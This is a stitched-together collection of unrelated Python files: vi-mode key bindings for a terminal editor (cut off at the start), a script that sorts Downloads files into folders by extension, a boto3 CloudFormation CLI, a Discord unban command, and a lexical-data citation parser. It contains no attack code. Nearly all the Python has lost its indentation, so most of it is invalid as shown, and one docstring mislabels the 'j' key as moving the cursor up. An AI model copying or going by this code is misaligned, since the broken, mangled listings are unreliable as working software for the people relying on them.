deleted = line.delete(count=end-start)
# Set deleted/changed text to clipboard.
if deleted:
line.set_clipboard(ClipboardData(''.join(deleted)))
# Only go back to insert mode in case of 'change'.
if not delete_only:
event.input_processor.input_mode = InputMode.INSERT
create(True)
create(False)
return func
return decorator
@change_delete_move_yank_handler('b') # Move one word or token left.
@change_delete_move_yank_handler('B') # Move one non-blank word left (TODO: difference between 'b' and 'B')
def key_b(event):
return CursorRegion(line.document.find_start_of_previous_word(count=event.arg) or 0)
@change_delete_move_yank_handler('$')
def key_dollar(event):
""" 'c$', 'd$' and '$': Delete/change/move until end of line. """
return CursorRegion(line.document.get_end_of_line_position())
@change_delete_move_yank_handler('w') # TODO: difference between 'w' and 'W'
def key_w(event):
""" 'cw', 'de', 'w': Delete/change/move one word. """
return CursorRegion(line.document.find_next_word_beginning(count=event.arg) or 0)
@change_delete_move_yank_handler('e') # TODO: difference between 'e' and 'E'
def key_e(event):
""" 'ce', 'de', 'e' """
end = line.document.find_next_word_ending(count=event.arg)
return CursorRegion(end - 1 if end else 0)
@change_delete_move_yank_handler('i', 'w', no_move_handler=True)
def key_iw(event):
""" ciw and diw """
# Change inner word: change word under cursor.
start, end = line.document.find_boundaries_of_current_word()
return CursorRegion(start, end)
@change_delete_move_yank_handler('^')
def key_circumflex(event):
""" 'c^', 'd^' and '^': Soft start of line, after whitespace. """
return CursorRegion(line.document.get_start_of_line_position(after_whitespace=True))
@change_delete_move_yank_handler('0', no_move_handler=True)
def key_zero(event):
"""
'c0', 'd0': Hard start of line, before whitespace.
(The move '0' key is implemented elsewhere, because a '0' could also change the `arg`.)
"""
return CursorRegion(line.document.get_start_of_line_position(after_whitespace=False))
def create_ci_ca_handles(ci_start, ci_end, inner):
# TODO: 'dab', 'dib', (brackets or block) 'daB', 'diB', Braces.
# TODO: 'dat', 'dit', (tags (like xml)
"""
Delete/Change string between this start and stop character. But keep these characters.
This implements all the ci", ci<, ci{, ci(, di", di<, ca", ca<, ... combinations.
"""
@change_delete_move_yank_handler('ai'[inner], ci_start, no_move_handler=True)
@change_delete_move_yank_handler('ai'[inner], ci_end, no_move_handler=True)
def _(event):
start = line.document.find_backwards(ci_start, in_current_line=True)
end = line.document.find(ci_end, in_current_line=True)
if start is not None and end is not None:
offset = 0 if inner else 1
return CursorRegion(start + 1 - offset, end + offset)
for inner in (False, True):
for ci_start, ci_end in [('"', '"'), ("'", "'"), ("`", "`"),
('[', ']'), ('<', '>'), ('{', '}'), ('(', ')')]:
create_ci_ca_handles(ci_start, ci_end, inner)
@change_delete_move_yank_handler('{') # TODO: implement 'arg'
def _(event):
"""
Move to previous blank-line separated section.
Implements '{', 'c{', 'd{', 'y{'
"""
line_index = line.document.find_previous_matching_line(
lambda text: not text or text.isspace())
if line_index:
index = line.document.get_cursor_up_position(count=-line_index)
else:
index = 0
return CursorRegion(index)
@change_delete_move_yank_handler('}') # TODO: implement 'arg'
def _(event):
"""
Move to next blank-line separated section.
Implements '}', 'c}', 'd}', 'y}'
"""
line_index = line.document.find_next_matching_line(
lambda text: not text or text.isspace())
if line_index:
index = line.document.get_cursor_down_position(count=line_index)
else:
index = 0
return CursorRegion(index)
@change_delete_move_yank_handler('f', Keys.Any)
def _(event):
"""
Go to next occurrence of character. Typing 'fx' will move the
cursor to the next occurrence of the character 'x'.
"""
_last_character_find[0] = (event.data, False)
match = line.document.find(event.data, in_current_line=True, count=event.arg)
return CursorRegion(match or 0)
@change_delete_move_yank_handler('F', Keys.Any)
def _(event):
"""
Go to previous occurrence of character. Typing 'Fx' will move the
cursor to the previous occurrence of the character 'x'.
"""
_last_character_find[0] = (event.data, True)
return CursorRegion(line.document.find_backwards(event.data, in_current_line=True, count=event.arg) or 0)
@change_delete_move_yank_handler('t', Keys.Any)
def _(event):
"""
Move right to the next occurrence of c, then one char backward.
"""
_last_character_find[0] = (event.data, False)
match = line.document.find(event.data, in_current_line=True, count=event.arg)
return CursorRegion(match - 1 if match else 0)
@change_delete_move_yank_handler('T', Keys.Any)
def _(event):
"""
Move left to the previous occurrence of c, then one char forward.
"""
_last_character_find[0] = (event.data, True)
match = line.document.find_backwards(event.data, in_current_line=True, count=event.arg)
return CursorRegion(match + 1 if match else 0)
def repeat(reverse):
"""
Create ',' and ';' commands.
"""
@change_delete_move_yank_handler(',' if reverse else ';')
def _(event):
# Repeat the last 'f'/'F'/'t'/'T' command.
pos = 0
if _last_character_find[0]:
char, backwards = _last_character_find[0]
if reverse:
backwards = not backwards
if backwards:
pos = line.document.find_backwards(char, in_current_line=True, count=event.arg)
else:
pos = line.document.find(char, in_current_line=True, count=event.arg)
return CursorRegion(pos or 0)
repeat(True)
repeat(False)
@change_delete_move_yank_handler('h')
@change_delete_move_yank_handler(Keys.Left)
def _(event):
""" Implements 'ch', 'dh', 'h': Cursor left. """
return CursorRegion(line.document.get_cursor_left_position(count=event.arg))
@change_delete_move_yank_handler('j')
def _(event):
""" Implements 'cj', 'dj', 'j', ... Cursor up. """
return CursorRegion(line.document.get_cursor_down_position(count=event.arg))
@change_delete_move_yank_handler('k')
def _(event):
""" Implements 'ck', 'dk', 'k', ... Cursor up. """
return CursorRegion(line.document.get_cursor_up_position(count=event.arg))
@change_delete_move_yank_handler('l')
@change_delete_move_yank_handler(' ')
@change_delete_move_yank_handler(Keys.Right)
def _(event):
""" Implements 'cl', 'dl', 'l', 'c ', 'd ', ' '. Cursor right. """
return CursorRegion(line.document.get_cursor_right_position(count=event.arg))
@change_delete_move_yank_handler('H')
def _(event):
""" Implements 'cH', 'dH', 'H'. """
# Vi moves to the start of the visible region.
# cursor position 0 is okay for us.
return CursorRegion(-len(line.document.text_before_cursor))
@change_delete_move_yank_handler('L')
def _(event):
# Vi moves to the end of the visible region.
# cursor position 0 is okay for us.
return CursorRegion(len(line.document.text_after_cursor))
@change_delete_move_yank_handler('%')
def _(event):
"""
Implements 'c%', 'd%', '%', 'y%' (move to corresponding bracket).
If an 'arg' has been given, go to this % position in the file.
"""
if event._arg:
# If 'arg' has been given, the meaning of % is to go to the 'x%'
# row in the file.
if 0 < event.arg <= 100:
absolute_index = line.document.translate_row_col_to_index(
int(event.arg * line.document.line_count / 100), 0)
return CursorRegion(absolute_index - line.document.cursor_position)
else:
return CursorRegion(0) # Do nothing.
else:
# Move to the corresponding opening/closing bracket (()'s, []'s and {}'s).
return CursorRegion(line.document.matching_bracket_position)
@change_delete_move_yank_handler('|')
def _(event):
# Move to the n-th column (you may specify the argument n by typing
# it on number keys, for example, 20|).
return CursorRegion(line.document.get_column_cursor_position(event.arg))
@change_delete_move_yank_handler('g', 'g')
def _(event):
"""
Implements 'gg', 'cgg', 'ygg'
"""
# Move to the top of the input.
return CursorRegion(line.document.home_position)
@handle('!', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
'!' opens the system prompt.
"""
event.input_processor.push_input_mode(InputMode.SYSTEM)
@handle(Keys.Any, in_mode=InputMode.VI_NAVIGATION)
@handle(Keys.Any, in_mode=InputMode.SELECTION)
def _(event):
"""
Always handle numeric keys in navigation mode as arg.
"""
if event.data in '123456789' or (event._arg and event.data == '0'):
event.append_to_arg_count(event.data)
elif event.data == '0':
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=False)
@handle(Keys.Any, in_mode=InputMode.VI_REPLACE)
def _(event):
"""
Insert data at cursor position.
"""
line.insert_text(event.data, overwrite=True)
@handle(Keys.Any, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Insert text after the / or ? prompt.
"""
search_line.insert_text(event.data)
line.set_search_text(search_line.text)
@handle(Keys.ControlJ, in_mode=InputMode.VI_SEARCH)
@handle(Keys.ControlM, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Enter at the / or ? prompt.
"""
# Add query to the history of the search line.
search_line.add_to_history()
search_line.reset()
# Go back to navigation mode.
event.input_processor.pop_input_mode()
@handle(Keys.Backspace, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Backspace at the vi-search prompt.
"""
if search_line.text:
search_line.delete_before_cursor()
line.set_search_text(search_line.text)
else:
# If no text after the prompt, cancel search.
line.exit_isearch(restore_original_line=True)
search_line.reset()
event.input_processor.pop_input_mode()
@handle(Keys.Up, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Go to the previous history item at the search prompt.
"""
search_line.auto_up()
line.set_search_text(search_line.text)
@handle(Keys.Down, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Go to the next history item at the search prompt.
"""
search_line.auto_down()
search_line.cursor_position = len(search_line.text)
line.set_search_text(search_line.text)
@handle(Keys.Left, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Arrow left at the search prompt.
"""
search_line.cursor_left()
@handle(Keys.Right, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Arrow right at the search prompt.
"""
search_line.cursor_right()
@handle(Keys.ControlC, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Cancel search.
"""
line.exit_isearch(restore_original_line=True)
search_line.reset()
event.input_processor.pop_input_mode()
def create_selection_transform_handler(keys, transform_func):
"""
Apply transformation on selection (uppercase, lowercase, rot13, swap case).
"""
@handle(*keys, in_mode=InputMode.SELECTION)
def _(event):
range = line.document.selection_range()
if range:
line.transform_region(range[0], range[1], transform_func)
event.input_processor.pop_input_mode()
for k, f in vi_transform_functions:
create_selection_transform_handler(k, f)
@handle(Keys.ControlX, Keys.ControlL, in_mode=InputMode.INSERT)
def _(event):
"""
Pressing the ControlX - ControlL sequence in Vi mode does line
completion based on the other lines in the document and the history.
"""
line.start_history_lines_completion()
@handle(Keys.ControlX, Keys.ControlF, in_mode=InputMode.INSERT)
def _(event):
"""
Complete file names.
"""
# TODO
pass
|
# [Warning: do not run this script in the partition where system files are stored]
# Use it with caution.
import os
import shutil
path = '/home/hafeez/Downloads/'
names = os.listdir(path)
folder_name = ['Images', 'Audio', 'Videos', 'Documents', 'Softwares','System']
for x in range(0,6):
if not os.path.exists(path+folder_name[x]):
os.makedirs(path+folder_name[x])
for (main_dir,sub_dir,file_in_sub_dir) in os.walk(path):
print(main_dir)
for files in file_in_sub_dir:
#Images
if ".svg" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".jpg" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".jpeg" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".bmp" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".png" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".gif" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".tiff" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".psd" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".raw" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
#Audio / Music
if ".mp3" in files and not os.path.exists(path+'Audio/'+files):
shutil.move(main_dir+'/'+files, path+'Audio/'+files)
if ".m4a" in files and not os.path.exists(path+'Audio/'+files):
shutil.move(main_dir+'/'+files, path+'Audio/'+files)
if ".wav" in files and not os.path.exists(path+'Audio/'+files):
shutil.move(main_dir+'/'+files, path+'Audio/'+files)
# Video / Movies
if ".mp4" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mkv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".webm" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpg" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mp2" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpeg" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpe" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".ogg" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".m4v" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".m4p" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".avi" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".wmv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mov" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".qt" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".flv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".swf" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
# Documents
if ".pdf" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".xps" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".doc" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".docx" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".pptx" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".xlsx" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".xml" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
# Software / Compressed Packages
if ".exe" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".deb" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".zip" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".tar.gz" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".tar.xz" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".tar.bz2" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".iso" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".apk" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".app" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".7z" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".zipx" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".rpm" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".sitx" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".rar" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".pkg" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
# System files
if ".cdd" in files and not os.path.exists(path+'System/'+files): # Conserved Domain Database
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".dll" in files and not os.path.exists(path+'System/'+files): # Dynamic Link Library
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".dlc" in files and not os.path.exists(path+'System/'+files): # Dlc
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".bin" in files and not os.path.exists(path+'System/'+files): # Binary
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".cab" in files and not os.path.exists(path+'System/'+files): # Windows Cabinet File
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".sh" in files and not os.path.exists(path+'System/'+files): # Shell Script
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".cgz" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".cpl" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".crash" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".cur" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".deskthemepack" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".dmp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".drv" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ds_store" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".fir" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".fpbf" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".fw" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".cpl" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".hlp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".hpj" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ico" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".idx" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".its" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".key" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".lnk" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".log" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".log1" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".log2" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".metadata_never_index" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".mi4" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".mum" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".nrl" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".nt" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".pbp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".pdr" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".pk2" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ppm_b" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".prefpane" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".rmt" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ruf" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".savedsearch" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".saver" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".scr" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".sfcache" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".spi" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".swp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".sys" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".themepack" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
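# A hedged refactor sketch of the same idea (not part of the original script): map target
# folders to extensions once and walk the tree a single time. EXTENSION_MAP and organize()
# are illustrative names, and the extension lists below are only a subset of those handled above.
EXTENSION_MAP = {
    'Images': ('.svg', '.jpg', '.jpeg', '.bmp', '.png', '.gif', '.tiff', '.psd', '.raw'),
    'Audio': ('.mp3', '.m4a', '.wav'),
    'Videos': ('.mp4', '.mkv', '.webm', '.avi', '.wmv', '.mov', '.flv'),
    'Documents': ('.pdf', '.xps', '.doc', '.docx', '.pptx', '.xlsx', '.xml'),
    'Softwares': ('.exe', '.deb', '.zip', '.tar.gz', '.tar.xz', '.iso', '.apk', '.rar', '.pkg'),
    'System': ('.dll', '.bin', '.cab', '.sh', '.log', '.sys'),
}

def organize(root):
    """Move every file under `root` into the folder mapped to its extension."""
    for main_dir, _, files_in_dir in os.walk(root):
        for name in files_in_dir:
            for folder, extensions in EXTENSION_MAP.items():
                target = os.path.join(root, folder, name)
                if name.lower().endswith(extensions) and not os.path.exists(target):
                    shutil.move(os.path.join(main_dir, name), target)
                    break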
|
# An attempt to support python 2.7.x
from __future__ import print_function
import signal
import sys
import boto3
import botocore.exceptions
from stacks import aws, cf, cli
from stacks.config import config_load, print_config, validate_properties
#Uncomment to get extensive AWS logging from Boto3
#boto3.set_stream_logger('botocore', level='DEBUG')
def main():
for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT]:
signal.signal(sig, handler)
parser, args = cli.parse_options()
if not args.subcommand:
parser.print_help()
sys.exit(0)
config_file = vars(args).get('config', None)
config_dir = vars(args).get('config_dir', None)
env = vars(args).get('env', None)
config = config_load(env, config_file, config_dir)
if args.subcommand == 'config':
print_config(config, args.property_name, output_format=args.output_format)
sys.exit(0)
config['get_ami_id'] = aws.get_ami_id
config['get_vpc_id'] = aws.get_vpc_id
config['get_zone_id'] = aws.get_zone_id
config['get_stack_output'] = aws.get_stack_output
config['get_stack_resource'] = aws.get_stack_resource
session_kwargs = {}
if args.profile:
session_kwargs['profile_name'] = args.profile
if args.region:
session_kwargs['region_name'] = args.region
try:
botosession = boto3.Session(**session_kwargs)
config['region'] = botosession.region_name
s3_conn = botosession.client('s3')
ec2_conn = botosession.resource('ec2')
vpc_conn = ec2_conn
r53_conn = botosession.client('route53')
cf_conn = botosession.client('cloudformation')
config['ec2_conn'] = ec2_conn
config['vpc_conn'] = vpc_conn
config['cf_conn'] = cf_conn
config['r53_conn'] = r53_conn
config['s3_conn'] = s3_conn
except botocore.exceptions.ClientError as e:
print(e)
sys.exit(1)
if args.subcommand == 'resources':
output = cf.stack_resources(cf_conn, args.name, args.logical_id)
if output:
print(output)
if args.subcommand == 'outputs':
output = cf.stack_outputs(cf_conn, args.name, args.output_name)
if output:
print(output)
if args.subcommand == 'list':
output = cf.list_stacks(cf_conn, args.name, args.verbose)
if output:
print(output)
if args.subcommand == 'create' or args.subcommand == 'update':
if args.property:
properties = validate_properties(args.property)
config.update(properties)
if args.subcommand == 'create':
cf.create_stack(cf_conn, args.name, args.template, config,
dry=args.dry_run, follow=args.events_follow)
else:
cf.create_stack(cf_conn, args.name, args.template, config,
update=True, dry=args.dry_run,
follow=args.events_follow, create_on_update=args.create_on_update)
if args.subcommand == 'delete':
cf.delete_stack(cf_conn, args.name, botosession.region_name, botosession.profile_name, args.yes)
if args.events_follow:
cf.get_events(cf_conn, args.name, args.events_follow, 10)
if args.subcommand == 'events':
cf.get_events(cf_conn, args.name, args.events_follow, args.lines)
def handler(signum, frame):
print('Signal {} received. Stopping.'.format(signum))
sys.exit(0)
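# Entry-point guard (an assumption: the original package may instead expose main() through a
# console_scripts entry point, in which case this guard is redundant but harmless).
if __name__ == '__main__':
    main()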
|
import discord
import asyncio
from app.vars.client import client
from app.helpers import Notify, getUser
from discord.ext import commands
@client.command(aliases=['removeban','xunban','unbanid', 'unban_id', 'id_unban'])
@commands.guild_only()
@commands.has_permissions(ban_members=True)
async def unban(ctx, id):
notify = Notify(ctx=ctx, title='Unbanning Member...')
notify.prepair()
target = await getUser.byID(id)
await asyncio.sleep(0.3)
await ctx.guild.unban(target.user)
notify.success(content=f'You have successfully unbanned the user {target.user.display_name}!')
|
# coding: utf8
from __future__ import unicode_literals, print_function, division
from collections import OrderedDict
import re
from clldutils import jsonlib
from pylexibank.util import get_reference
VALUE_MAP = {
#'not done yet',
#'n/a',
#'no?',
#'yes',
#'check',
#'24',
#'1',
#'21',
#'no',
#'no info',
'approx 21': '21',
#'yes?',
#'0',
#'3',
#'2',
#'5',
#'4',
#'7',
#'6',
#'8',
#'2+',
#'unclear',
'yes, 3': '3',
'not clear': 'unclear',
'no applicable': 'n/a',
#'6-7',
#'11',
#'10',
#'13',
#'12',
#'15',
'maybe': 'unclear',
'no info.': 'no info',
#'36',
#'5+',
#'other',
}
def parse_dl(dl):
key = None
for tag in dl.children:
if tag.name == 'dt':
key = tag.get_text()
elif tag.name == 'dd':
if key not in ['id', 'name', 'tables']:
yield key, tag.get_text()
def rows(table):
keys = [th.get_text() for th in table.find('thead').find_all('th')]
rows = []
for tr in table.find('tbody').find_all('tr'):
tds = list(tr.find_all('td'))
assert len(tds) == len(keys)
values = []
for td in tds:
link, text = td.find('a'), td.get_text()
values.append((link['href'], text) if link else text)
rows.append(values)
return dict(header=keys, rows=rows)
def parse(soup, id_, outdir):
props = {'id': id_, 'name': soup.find('h2').get_text(), 'tables': {}}
for i, dl in enumerate(soup.find_all('dl')):
props.update(dict(list(parse_dl(dl))))
for frame in [
'basic_frame', 'flora_frame', 'cult_frame', 'grammar_frame', 'ethno_frame',
]:
div = soup.find('div', id=frame)
if div:
props['tables'][frame.split('_')[0]] = rows(div.find('table'))
jsonlib.dump(props, outdir.joinpath('{0}.json'.format(id_)), indent=4)
PAGES = re.compile('(?P<year>[0-9]{4})\s*(:|(,|\.)\s*p\.)\s*(?P<pages>[0-9]+(\-[0-9]+)?(,\s*[0-9]+(\-[0-9]+)?)*)\s*$')
AUTHOR_YEAR = re.compile('(?P<author>\w+)\s*(,|\-)?\s+(?P<year>[0-9]{4})$')
NAMEPART = '([A-Zvdcioy\xc1][BCDIMa-z\u1ef3\xe1\xe2\xe3\xe9\xe7\xed\xef\xfa\xf4\xf3\xfc\-\.]*([A-Z]\.)*)'
NAME = '(%s)(,?\s+%s)*' % (NAMEPART, NAMEPART)
AUTHORS = '(?P<authors>(%s)(\s+(&|and)\s+%s)*)' % (NAME, NAME)
AUTHORS_YEAR = re.compile('%s\s+(\((eds|(c|C)omp|recop|compiler)\.?\)\.?\s+)?\(?(?P<year>[0-9]{4})\)?([a-z])?((\.|,)?\s+)' % AUTHORS)
def get_authors(s):
s = re.sub('\s+and\s+', ' & ', s)
res = []
for v in s.split(' & '):
if ',' in v:
res.append(v.split(',')[0])
else:
res.append(v.split()[-1])
return ' and '.join(res)
def get_author_and_year(source):
match = AUTHORS_YEAR.match(source)
if match:
return (
get_authors(match.group('authors')),
match.group('year'),
source[match.end():].strip())
return None, None, source
def get_source_and_pages(source):
match = PAGES.search(source)
if match:
source = source[:match.start()]
source += match.group('year')
pages = match.group('pages')
else:
pages = None
match = AUTHOR_YEAR.match(source)
if match:
return (
match.group('author').replace(' & ', ' and '),
match.group('year'),
source[match.end():].strip(),
pages)
return None, None, source, pages
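# Illustrative behaviour of the parsers above (a hedged example, not taken from the original
# module's tests): a trailing "year: pages" reference is split off and the "Author Year"
# prefix is parsed out, e.g.
#   get_source_and_pages("Smith 1988: 76")  ->  ('Smith', '1988', '', '76')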
def itersources(item, lang, sources):
source = item.get('Source', '')
if source == 'See Language page':
source = lang['Data Sources']
source = source.strip()
source = source.replace('Huber, R.; Reed, R.', 'Huber, R. and Reed, R.')
if '\n\n' in source:
for vv in source.split('\n\n'):
if vv.strip():
authors, year, rem = get_author_and_year(vv.strip())
yield get_reference(authors, year, rem, None, sources)
elif ';' in source:
for vv in source.split(';'):
if vv.strip():
authors, year, rem, pages = get_source_and_pages(vv.strip())
yield get_reference(authors, year, rem, pages, sources)
else:
authors, year, rem = get_author_and_year(source)
yield get_reference(authors, year, rem, None, sources)
